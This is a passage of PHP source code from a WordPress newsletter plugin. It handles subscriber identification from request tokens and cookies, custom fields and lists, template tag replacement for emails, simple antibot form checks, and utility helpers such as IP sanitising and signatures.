}
foreach ($attachments as $id => $attachment) {
$image = wp_get_attachment_image_src($id, $size);
return $image[0];
}
}
}
function get_email_from_request() {
if (isset($_REQUEST['nek'])) {
list($id, $token) = explode('-', wp_unslash($_REQUEST['nek']), 2);
} else if (isset($_COOKIE['tnpe'])) {
list($id, $token) = explode('-', wp_unslash($_COOKIE['tnpe']), 2);
} else {
return null;
}
$email = $this->get_email($id);
// TODO: Check the token? It's really useful?
return $email;
}
/** Searches for a user using the nk parameter or the ni and nt parameters. Tries even with the newsletter cookie.
* If found, the user object is returned or null.
* The user is returned without regards to his status that should be checked by caller.
*
* DO NOT REMOVE EVEN IF OLD
*
* @return TNP_User
*/
function check_user($context = '') {
global $wpdb;
$user = null;
if (isset($_REQUEST['nk'])) {
list($id, $token) = @explode('-', wp_unslash($_REQUEST['nk']), 2);
} elseif (isset($_COOKIE['newsletter'])) {
list($id, $token) = @explode('-', wp_unslash($_COOKIE['newsletter']), 2);
}
if (isset($id)) {
$user = $this->get_user($id);
if ($user) {
if ($context === 'preconfirm') {
if ($token !== md5($user->token)) {
$user = null;
}
} else {
if ($token !== $user->token) {
$user = null;
}
}
}
}
return apply_filters('newsletter_current_user', $user);
}
/**
* Accepts a user ID or a TNP_User object. Does not check if the user really exists.
*
* @param type $user
*/
function get_user_edit_url($user) {
$id = $this->to_int_id($user);
return admin_url('admin.php') . '?page=newsletter_users_edit&id=' . $id;
}
function get_user_status_label($user, $html = false) {
if (is_string($user)) {
$x = $user;
$user = new stdClass();
$user->status = $x;
}
if (!$html) {
return TNP_User::get_status_label($user->status);
}
$label = TNP_User::get_status_label($user->status);
$class = 'unknown';
switch ($user->status) {
case TNP_User::STATUS_NOT_CONFIRMED: $class = 'not-confirmed';
break;
case TNP_User::STATUS_CONFIRMED: $class = 'confirmed';
break;
case TNP_User::STATUS_UNSUBSCRIBED: $class = 'unsubscribed';
break;
case TNP_User::STATUS_BOUNCED: $class = 'bounced';
break;
case TNP_User::STATUS_COMPLAINED: $class = 'complained';
break;
}
return '<span class="tnp-status tnp-user-status tnp-user-status--' . $class . '">' . esc_html($label) . '</span>';
}
/**
* Return the user identified by the "nk" parameter (POST or GET).
* If no user can be found or the token is not matching, returns null.
* If die_on_fail is true it dies instead of return null.
*
* @param bool $die_on_fail
* @return TNP_User
*/
function get_user_from_request($die_on_fail = false, $context = '') {
$id = 0;
if (isset($_REQUEST['nk'])) {
list($id, $token) = @explode('-', wp_unslash($_REQUEST['nk']), 2);
}
$user = $this->get_user($id);
if ($user == null) {
if ($die_on_fail) {
die(esc_html__('No subscriber found.', 'newsletter'));
} else {
return $this->get_user_from_logged_in_user();
}
}
if ($token != $user->token && $token != md5($user->token)) {
if ($die_on_fail) {
die(esc_html__('No subscriber found.', 'newsletter'));
} else {
return $this->get_user_from_logged_in_user();
}
}
return $user;
}
function set_user_cookie($user) {
setcookie('newsletter', $this->get_user_key($user), time() + YEAR_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN, is_ssl());
}
function delete_user_cookie() {
setcookie('newsletter', '', time() - YEAR_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN, is_ssl());
}
function is_current_user_dummy() {
if (!current_user_can('administrator'))
return false;
if (isset($_REQUEST['nk'])) {
list($id, $token) = explode('-', wp_unslash($_REQUEST['nk']), 2);
} elseif (isset($_COOKIE['newsletter'])) {
list ($id, $token) = explode('-', $_COOKIE['newsletter'], 2);
} else {
return false;
}
return $id === '0';
}
/**
*
* @return TNP_User
*/
function get_current_user() {
$id = 0;
$user = null;
if (isset($_REQUEST['nk'])) {
list($id, $token) = explode('-', wp_unslash($_REQUEST['nk']), 2);
if (current_user_can('administrator') && $id === '0') {
$user = $this->get_dummy_user();
return $user;
}
} elseif (isset($_COOKIE['newsletter'])) {
list ($id, $token) = explode('-', $_COOKIE['newsletter'], 2);
}
if ($id) {
$user = $this->get_user($id);
if ($user) {
$user->_dummy = false;
$token_md5 = md5($user->token);
if ($token !== $user->token && $token !== $token_md5) {
$user = null;
} else {
$user->_trusted = $token === $user->token;
}
}
}
$user = apply_filters('newsletter_current_user', $user);
return $user;
}
/**
* Managed by WP Users Addon
* @deprecated since version 7.6.7
* @return TNP_User
*/
function get_user_from_logged_in_user() {
return null;
}
function get_user_count($refresh = false) {
global $wpdb;
$user_count = get_transient('newsletter_user_count');
if ($user_count === false || $refresh) {
$user_count = $wpdb->get_var("select count(*) from " . NEWSLETTER_USERS_TABLE . " where status='C'");
set_transient('newsletter_user_count', $user_count, DAY_IN_SECONDS);
}
return $user_count;
}
/**
* Returns all configured custom fields using the current language.
*
* @return TNP_Profile[]
*/
function get_customfields() {
//static $customfields = null;
//if (is_null($customfields)) {
$customfields = [];
$options = $this->get_options('customfields');
$main_options = $this->get_options('customfields', '');
for ($i = 1; $i <= NEWSLETTER_PROFILE_MAX; $i++) {
$prefix = 'profile_' . $i;
if (!empty($main_options[$prefix])) {
$name = empty($options[$prefix]) ? $main_options[$prefix] : $options[$prefix];
$field = new TNP_Profile($i, $name);
$field->type = $main_options[$prefix . '_type'];
$values = empty($options[$prefix . '_options']) ? $main_options[$prefix . '_options'] : $options[$prefix . '_options'];
$items = array_map('trim', explode(',', $values));
$items = array_combine($items, $items);
$field->options = $items;
$field->placeholder = empty($options[$prefix . '_placeholder']) ? $main_options[$prefix . '_placeholder'] : $options[$prefix . '_placeholder'];
$field->rule = $options[$prefix . '_rules'];
$field->status = (int) $options[$prefix . '_status'];
$customfields['' . $i] = $field;
}
}
//}
return $customfields;
}
/**
* Returns the specified custom field (onlyif configured, null otherwise).
*
* @param TNP_Profile $id
* @return TNP_Profile[]
*/
function get_customfield($id) {
$customfields = $this->get_customfields();
if (isset($customfields[$id])) {
return $customfields[$id];
} else {
return null;
}
}
/**
* Returns an array (id => object) with all custom fields that can be used
* on frontend.
*
* @staticvar TNP_Profile[] $customfields Internal cache
* @return TNP_Profile[]
*/
function get_customfields_public() {
//static $customfields = null;
//if (is_null($customfields)) {
$customfields = [];
foreach ($this->get_customfields() as $customfield) {
if ($customfield->is_public()) {
$customfields['' . $customfield->id] = $customfield;
}
}
//}
return $customfields;
}
/**
* Returns a list of public custom fields.
*
* @return TNP_Profile[]
* @deprecated since version 7.8.0
*/
function get_profiles_public() {
return $this->get_customfields_public();
}
/**
* Return a custom field.
* @param int $id
* @return TNP_Profile
* @deprecated since version 7.8.0
*/
function get_profile($id) {
return $this->get_customfield($id);
}
/**
* @param string $language The language for the list labels (it does not affect the lists returned)
* @return TNP_Profile[]
* @deprecated since version 7.8.0
*/
function get_profiles() {
return $this->get_customfields();
}
/**
* @param string $language The language for the list labels (it does not affect the lists returned)
* @return TNP_List[]
*/
function get_lists() {
static $lists = null;
if (is_null($lists)) {
$options = $this->get_options('lists');
$lists = TNP_List::build($options);
}
return $lists;
}
/**
* Lists to be shown on subscription form.
*
* @return TNP_List[]
* @deprecated since version 7.8.0
*/
function get_lists_for_subscription($language = '') {
return $this->get_lists_public();
}
/**
* Returns the lists to be shown in the profile page. The list is associative with
* the list ID as key.
*
* @return TNP_List[]
* @deprecated since version 7.8.0
*/
function get_lists_for_profile($language = '') {
return $this->get_lists_public();
}
/**
* Returns the list object or null if not found.
*
* @param int $id
* @return TNP_List
*/
function get_list($id, $language = '') {
$lists = $this->get_lists($language);
if (!isset($lists['' . $id])) {
return null;
}
return $lists['' . $id];
}
/**
* Updates the user last activity timestamp.
*
* @global wpdb $wpdb
* @param TNP_User $user
*/
function update_user_last_activity($user) {
global $wpdb;
if (!$user) {
return;
}
$this->query($wpdb->prepare("update " . NEWSLETTER_USERS_TABLE . " set last_activity=%d where id=%d limit 1", time(), $user->id));
}
function update_user_ip($user, $ip) {
global $wpdb;
if (!$user) {
return;
}
if (!$ip) {
return;
}
// Only if changed
$r = $this->query($wpdb->prepare("update " . NEWSLETTER_USERS_TABLE . " set ip=%s, geo=0 where ip<>%s and id=%d limit 1", $ip, $ip, $user->id));
}
/**
* Finds single style blocks and adds a style attribute to every HTML tag with a class exactly matching the rules in the style
* block. HTML tags can use the attribute "inline-class" to exact match a style rules if they need a composite class definition.
*
* @param string $content
* @param boolean $strip_style_blocks
* @return string
*/
function inline_css($content, $strip_style_blocks = false) {
$matches = array();
// "s" skips line breaks
$styles = preg_match('|<style>(.*?)</style>|s', $content, $matches);
if (isset($matches[1])) {
$style = str_replace(array("\n", "\r"), '', $matches[1]);
$rules = array();
preg_match_all('|\s*\.(.*?)\{(.*?)\}\s*|s', $style, $rules);
for ($i = 0; $i < count($rules[1]); $i++) {
$class = trim($rules[1][$i]);
$value = trim($rules[2][$i]);
$value = preg_replace('|\s+|', ' ', $value);
//$content = str_replace(' class="' . $class . '"', ' class="' . $class . '" style="' . $value . '"', $content);
$content = str_replace(' inline-class="' . $class . '"', ' style="' . $value . '"', $content);
}
}
if ($strip_style_blocks) {
return trim(preg_replace('|<style>.*?</style>|s', '', $content));
} else {
return $content;
}
}
/**
* Add to a destination URL the parameters to identify the user, the email and to show
* an alert message, if required. The parameters are then managed by the [newsletter] shortcode.
*
* @param string $url If empty the standard newsletter page URL is used (usually it is empty, but sometime a custom URL has been specified)
* @param string $message_key The message identifier
* @param TNP_User|int $user
* @param TNP_Email|int $email
* @param string $alert An optional alter message to be shown. Does not work with custom URLs
* @return string The final URL with parameters
*/
function build_message_url($url = '', $message_key = '', $user = null, $email = null, $alert = '') {
$params = 'nm=' . rawurlencode($message_key);
$language = '';
if ($user) {
if (!is_object($user)) {
$user = $this->get_user($user);
}
$params .= '&nk=' . rawurlencode($this->get_user_key($user));
$language = $this->get_user_language($user);
}
if ($email) {
if (!is_object($email)) {
$email = $this->get_email($email);
}
$params .= '&nek=' . rawurlencode($this->get_email_key($email));
}
if ($alert) {
$alert = wp_strip_all_tags($alert, true);
$params .= '&alert=' . rawurlencode($alert);
}
if (empty($url)) {
$url = Newsletter::instance()->get_newsletter_page_url($language);
}
$url = apply_filters('newsletter_message_url', $url);
// Do not accept filtered empty urls...
if (empty($url)) {
$url = Newsletter::instance()->get_newsletter_page_url($language);
}
return self::add_qs($url, $params, false);
}
function get_subscribe_url() {
return $this->build_action_url('s');
}
/**
* Returns the user language IF there is a supported mutilanguage plugin installed.
* @param TNP_User $user
* @return string Language code or empty
*/
function get_user_language($user) {
if ($user && $this->is_multilanguage()) {
return $user->language;
}
return '';
}
/**
*
* @global wpdb $wpdb
* @param string $text
* @param TNP_User $user
* @param type $email
* @return string
*/
function replace_for_email($text, $user = null, $email = null) {
global $wpdb;
if (empty($text)) {
return $text;
}
// When sending email, the subscriber key needs to be the trusted one, since it is sent to the
// subscriber mailbox, and it can be accessed only by the subscriber.
$trusted = $user->_trusted ?? true;
$user->_trusted = true;
$html = strpos($text, '<p') !== false;
$home_url = home_url('/');
Newsletter::instance()->switch_language($user);
$text = apply_filters('newsletter_replace', $text, $user, $email, $html, null);
$text = $this->replace_url($text, 'blog_url', $home_url);
$text = $this->replace_url($text, 'home_url', $home_url);
$text = str_replace('{blog_title}', html_entity_decode(get_bloginfo('name')), $text);
$text = str_replace('{blog_description}', get_option('blogdescription'), $text);
if ($email) {
$text = $this->replace_date($text, $email->send_on);
}
$nk = $this->get_user_key($user);
$token = $user->token;
$text = str_replace('{email}', esc_html($user->email), $text);
$name = $this->sanitize_name($user->name);
if (empty($name)) {
$text = str_replace(' {name}', '', $text);
$text = str_replace('{name}', '', $text);
$text = str_replace(' {first_name}', '', $text);
$text = str_replace('{first_name}', '', $text);
} else {
$text = str_replace('{name}', esc_html($name), $text);
$text = str_replace('{first_name}', esc_html($name), $text);
}
$surname = $this->sanitize_name($user->surname);
$text = str_replace('{surname}', esc_html($surname), $text);
$text = str_replace('{last_name}', esc_html($surname), $text);
$full_name = trim($name . ' ' . $surname);
if (empty($full_name)) {
$text = str_replace(' {full_name}', '', $text);
$text = str_replace('{full_name}', '', $text);
} else {
$text = str_replace('{full_name}', esc_html($full_name), $text);
}
switch ($user->sex) {
case 'm': $text = str_replace('{title}', esc_html($this->get_text('title_male', 'form')), $text);
break;
case 'f': $text = str_replace('{title}', esc_html($this->get_text('title_female', 'form')), $text);
break;
default:
$text = str_replace('{title}', esc_html($this->get_text('title_none', 'form')), $text);
}
for ($i = 1; $i <= NEWSLETTER_PROFILE_MAX; $i++) {
$p = 'profile_' . $i;
$value = $this->sanitize_user_field($user->$p);
$text = str_replace('{profile_' . $i . '}', esc_html($value), $text);
}
$text = str_replace('{token}', $token, $text);
$text = str_replace('%7Btoken%7D', $token, $text);
$text = str_replace('{id}', $user->id, $text);
$text = str_replace('%7Bid%7D', $user->id, $text);
$text = str_replace('{ip}', esc_html($user->ip), $text);
$text = str_replace('{key}', $nk, $text);
$text = str_replace('%7Bkey%7D', $nk, $text);
// Links
$text = $this->replace_url($text, 'subscription_confirm_url', $this->build_action_url('c', $user, $email));
$text = $this->replace_url($text, 'activation_url', $this->build_action_url('c', $user, $email));
// To be moved to the "content lock" addon
$text = $this->replace_url($text, 'unlock_url', $this->build_action_url('ul', $user));
if ($email) {
$nek = $this->get_email_key($email);
$text = str_replace('{email_id}', $email->id, $text);
$text = str_replace('{email_key}', $nek, $text);
$text = str_replace('{email_subject}', $email->subject, $text);
// Deprecated
$text = str_replace('{subject}', $email->subject, $text);
$text = $this->replace_url($text, 'email_url', $this->build_action_url('v', $user) . '&id=' . $email->id);
} else {
$text = $this->replace_url($text, 'email_url', '#');
}
$options = Newsletter::instance()->get_options('info');
// Do not escape HTML here since it's a free text
$text = str_replace('{company_address}', wp_kses_post($options['footer_contact']), $text);
$text = str_replace('{company_name}', wp_kses_post($options['footer_title']), $text);
$text = str_replace('{company_legal}', wp_kses_post($options['footer_legal']), $text);
Newsletter::instance()->restore_language();
$user->_trusted = $trusted;
return $text;
}
/**
* Replaces every possible Newsletter tag ({...}) in a piece of text or HTML.
*
* @global wpdb $wpdb
* @param string $text
* @param mixed $user Can be an object, associative array or id
* @param mixed $email Can be an object, associative array or id
* @param string $context (set to 'page' when used for the public page)
* @return type
*/
function replace($text, $user = null, $email = null, $context = null) {
global $wpdb;
if (empty($text))
return $text;
if (strpos($text, '<p') !== false) {
$html = true;
} else {
$html = false;
}
static $home_url = false;
if (!$home_url) {
$home_url = home_url('/');
}
if ($user !== null && !is_object($user)) {
if (is_array($user)) {
$user = (object) $user;
} else if (is_numeric($user)) {
$user = $this->get_user($user);
} else {
$user = null;
}
}
if ($email !== null && !is_object($email)) {
if (is_array($email)) {
$email = (object) $email;
} else if (is_numeric($email)) {
$email = $this->get_email($email);
} else {
$email = null;
}
}
Newsletter::instance()->switch_language($user);
$text = apply_filters('newsletter_replace', $text, $user, $email, $html, $context);
$text = $this->replace_url($text, 'blog_url', $home_url);
$text = $this->replace_url($text, 'home_url', $home_url);
$text = str_replace('{blog_title}', html_entity_decode(get_bloginfo('name')), $text);
$text = str_replace('{blog_description}', get_option('blogdescription'), $text);
if ($email) {
$text = $this->replace_date($text, $email->send_on);
}
if ($user) {
$trusted = $user->_trusted ?? true;
$nk = $this->get_user_key($user);
$token = $trusted ? $user->token : md5($user->token);
$text = str_replace('{email}', $user->email, $text);
$name = apply_filters('newsletter_replace_name', $user->name, $user);
$name = $this->sanitize_user_field($name);
if (empty($name)) {
$text = str_replace(' {name}', '', $text);
$text = str_replace('{name}', '', $text);
} else {
$text = str_replace('{name}', esc_html($name), $text);
}
switch ($user->sex) {
case 'm': $text = str_replace('{title}', $this->get_text('title_male', 'form'), $text);
break;
case 'f': $text = str_replace('{title}', $this->get_text('title_female', 'form'), $text);
break;
default:
$text = str_replace('{title}', $this->get_text('title_none', 'form'), $text);
}
$surname = $this->sanitize_user_field($user->surname);
$text = str_replace('{surname}', esc_html($surname), $text);
$text = str_replace('{last_name}', esc_html($surname), $text);
$full_name = esc_html(trim($name . ' ' . $surname));
if (empty($full_name)) {
$text = str_replace(' {full_name}', '', $text);
$text = str_replace('{full_name}', '', $text);
} else {
$text = str_replace('{full_name}', $full_name, $text);
}
$text = str_replace('{token}', $token, $text);
$text = str_replace('%7Btoken%7D', $token, $text);
$text = str_replace('{id}', $user->id, $text);
$text = str_replace('%7Bid%7D', $user->id, $text);
$text = str_replace('{ip}', $user->ip, $text);
$text = str_replace('{key}', $nk, $text);
$text = str_replace('%7Bkey%7D', $nk, $text);
for ($i = 1; $i <= NEWSLETTER_PROFILE_MAX; $i++) {
$p = 'profile_' . $i;
$value = $this->sanitize_user_field($user->$p);
$text = str_replace('{profile_' . $i . '}', $value, $text);
}
$base = (empty($this->options_main['url']) ? get_option('home') : $this->options_main['url']);
$id_token = '&ni=' . $user->id . '&nt=' . $token;
$text = $this->replace_url($text, 'subscription_confirm_url', $this->build_action_url('c', $user));
$text = $this->replace_url($text, 'activation_url', $this->build_action_url('c', $user));
// Obsolete.
$text = $this->replace_url($text, 'FOLLOWUP_SUBSCRIPTION_URL', self::add_qs($base, 'nm=fs' . $id_token));
$text = $this->replace_url($text, 'FOLLOWUP_UNSUBSCRIPTION_URL', self::add_qs($base, 'nm=fu' . $id_token));
$text = $this->replace_url($text, 'UNLOCK_URL', $this->build_action_url('ul', $user));
} else {
//$this->logger->debug('Replace without user');
$text = $this->replace_url($text, 'subscription_confirm_url', '#');
$text = $this->replace_url($text, 'activation_url', '#');
}
if ($email) {
//$this->logger->debug('Replace with email ' . $email->id);
$nek = $this->get_email_key($email);
$text = str_replace('{email_id}', $email->id, $text);
$text = str_replace('{email_key}', $nek, $text);
$text = str_replace('{email_subject}', $email->subject, $text);
// Deprecated
$text = str_replace('{subject}', $email->subject, $text);
$text = $this->replace_url($text, 'email_url', $this->build_action_url('v', $user) . '&id=' . $email->id);
} else {
//$this->logger->debug('Replace without email');
$text = $this->replace_url($text, 'email_url', '#');
}
// Company info
// TODO: Move to another module
$options = Newsletter::instance()->get_options('info');
$text = str_replace('{company_address}', $options['footer_contact'], $text);
$text = str_replace('{company_name}', $options['footer_title'], $text);
$text = str_replace('{company_legal}', $options['footer_legal'], $text);
Newsletter::instance()->restore_language();
return $text;
}
function replace_date($text, $timestamp = 0) {
if (!$timestamp) {
$timestamp = time();
}
$timestamp += (int) (get_option('gmt_offset') * 3600);
$text = str_replace('{date}', date_i18n(get_option('date_format'), $timestamp), $text);
// Date processing
$x = 0;
while (($x = strpos($text, '{date_', $x)) !== false) {
$y = strpos($text, '}', $x);
if ($y === false) {
continue;
}
$f = substr($text, $x + 6, $y - $x - 6);
$text = substr($text, 0, $x) . date_i18n($f, $timestamp) . substr($text, $y + 1);
}
return $text;
}
function replace_url($text, $tag, $url) {
static $home = false;
if (!$home) {
$home = trailingslashit(home_url());
}
$tag_lower = strtolower($tag);
$text = str_replace('http://{' . $tag_lower . '}', $url, $text);
$text = str_replace('https://{' . $tag_lower . '}', $url, $text);
$text = str_replace($home . '{' . $tag_lower . '}', $url, $text);
$text = str_replace($home . '%7B' . $tag_lower . '%7D', $url, $text);
$text = str_replace('{' . $tag_lower . '}', $url, $text);
$text = str_replace('%7B' . $tag_lower . '%7D', $url, $text);
$url_encoded = rawurlencode($url);
$text = str_replace('%7B' . $tag_lower . '_encoded%7D', $url_encoded, $text);
$text = str_replace('{' . $tag_lower . '_encoded}', $url_encoded, $text);
// for compatibility
$text = str_replace($home . $tag, $url, $text);
return $text;
}
public static function antibot_form_check($captcha = false) {
if (is_user_logged_in()) {
return true;
}
if (defined('NEWSLETTER_ANTIBOT') && !NEWSLETTER_ANTIBOT) {
return true;
}
if ('POST' !== $_SERVER['REQUEST_METHOD'] ?? '') {
return false;
}
if (!isset($_POST['ts']) || time() - $_POST['ts'] > 60) {
return false;
}
if ($captcha) {
if (!isset($_POST['n1']) || !isset($_POST['n2']) || !isset($_POST['n3'])) {
return false;
}
$n1 = (int) $_POST['n1'];
if (empty($n1)) {
return false;
}
$n2 = (int) $_POST['n2'];
if (empty($n2)) {
return false;
}
$n3 = (int) $_POST['n3'];
if ($n1 + $n2 != $n3) {
return false;
}
}
return true;
}
public static function request_to_antibot_form($submit_label = 'Continue...', $captcha = false) {
require __DIR__ . '/antibot-subscription.php';
die();
}
public static function antibot_subscription($submit_label = 'Continue...', $captcha = false) {
require __DIR__ . '/antibot-subscription.php';
die();
}
public static function antibot_unsubscription($submit_label = 'Continue...', $captcha = false) {
require __DIR__ . '/antibot-unsubscription.php';
die();
}
static function extract_body($html) {
$x = stripos($html, '<body');
if ($x !== false) {
$x = strpos($html, '>', $x);
$y = strpos($html, '</body>');
return substr($html, $x + 1, $y - $x - 1);
} else {
return $html;
}
}
/** Returns a percentage as string */
static function percent($value, $total) {
if ($total == 0) {
return '-';
}
return sprintf("%.2f", $value / $total * 100) . '%';
}
/** Returns a percentage as integer value */
static function percentValue($value, $total) {
if ($total == 0) {
return 0;
}
return round($value / $total * 100);
}
/**
* Takes in a variable and checks if object, array or scalar and return the integer representing
* a database record id.
*
* @param mixed $var
* @return in
*/
static function to_int_id($var) {
if (is_object($var)) {
return (int) $var->id;
}
if (is_array($var)) {
return (int) $var['id'];
}
return (int) $var;
}
static function to_array($text) {
$text = trim($text);
if (empty($text)) {
return array();
}
$text = preg_split("/\\r\\n/", $text);
$text = array_map('trim', $text);
$text = array_map('strtolower', $text);
$text = array_filter($text);
return $text;
}
static function sanitize_ip($ip) {
if (empty($ip)) {
return '';
}
$ip = preg_replace('/[^0-9a-fA-F:., ]/', '', trim($ip));
if (strlen($ip) > 50)
$ip = substr($ip, 0, 50);
// When more than one IP is present due to firewalls, proxies, and so on. The first one should be the origin.
if (strpos($ip, ',') !== false) {
list($ip, $tail) = explode(',', $ip, 2);
}
return $ip;
}
static function get_remote_ip() {
$ip = '';
if (!empty($_SERVER['HTTP_X_REAL_IP'])) {
$ip = wp_unslash($_SERVER['HTTP_X_REAL_IP']);
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = wp_unslash($_SERVER['HTTP_X_FORWARDED_FOR']);
} elseif (isset($_SERVER['REMOTE_ADDR'])) {
$ip = wp_unslash($_SERVER['REMOTE_ADDR']);
}
return self::sanitize_ip($ip);
}
static function get_signature($text) {
$key = NewsletterStatistics::instance()->options['key'];
return md5($text . $key);
}
static function check_signature($text, $signature) {
if (empty($signature)) {
return false;
}
$key = NewsletterStatistics::instance()->options['key'];
return md5($text . $key) === $signature;
}
static function get_home_url() {
static $url = false;
if (!$url) {
$url = home_url('/');
}
return $url;
}
static function clean_eol($text) {
$text = str_replace("\r\n", "\n", $text);
$text = str_replace("\r", "\n", $text);
$text = str_replace("\n", "\r\n", $text);
return $text;
}
function set_current_language($language) {
$this->switch_language($language);
}
function get_default_language() {
if (class_exists('SitePress')) {
return $current_language = apply_filters('wpml_current_language', '');
} elseif (function_exists('pll_default_language')) {
return pll_default_language();
} elseif (class_exists('TRP_Translate_Press')) {
// TODO: Find the default language
}
return '';
}
function is_default_language() {
return $this->get_current_language() == $this->get_default_language();
}
protected function generate_admin_notification_message($user) {
$message = file_get_contents(__DIR__ . '/notification.html');
$message = $this->replace($message, $user);
$message = str_replace('{user_admin_url}', admin_url('admin.php?page=newsletter_users_edit&id=' . $user->id), $message);
return $message;
}
protected function generate_admin_notification_subject($subject) {
$blogname = wp_specialchars_decode(get_option('blogname'), ENT_QUOTES);
return '[' . $blogname . '] ' . $subject;
}
/**
* For compatibility.
*
* @deprecated since version 7.8.0
*/
function is_admin_page() {
NewsletterAdmin::instance()->is_admin_page();
}
}
/**
* Kept for compatibility.
*
* @param type $post_id
* @param type $size
* @param type $alternative
* @return type
*/
function nt_post_image($post_id = null, $size = 'thumbnail', $alternative = null) {
return NewsletterModule::get_post_image($post_id, $size, $alternative);
}
function newsletter_get_post_image($post_id = null, $size = 'thumbnail', $alternative = null) {
echo NewsletterModule::get_post_image($post_id, $size, $alternative);
}
/**
* Accepts a post or a post ID.
*
* @param WP_Post $post
*/
function newsletter_the_excerpt($post, $words = 30) {
$post = get_post($post);
$excerpt = $post->post_excerpt;
if (empty($excerpt)) {
$excerpt = $post->post_content;
$excerpt = strip_shortcodes($excerpt);
$excerpt = wp_strip_all_tags($excerpt, true);
}
echo '<p>', esc_html(wp_trim_words($excerpt, $words)), '</p>';
}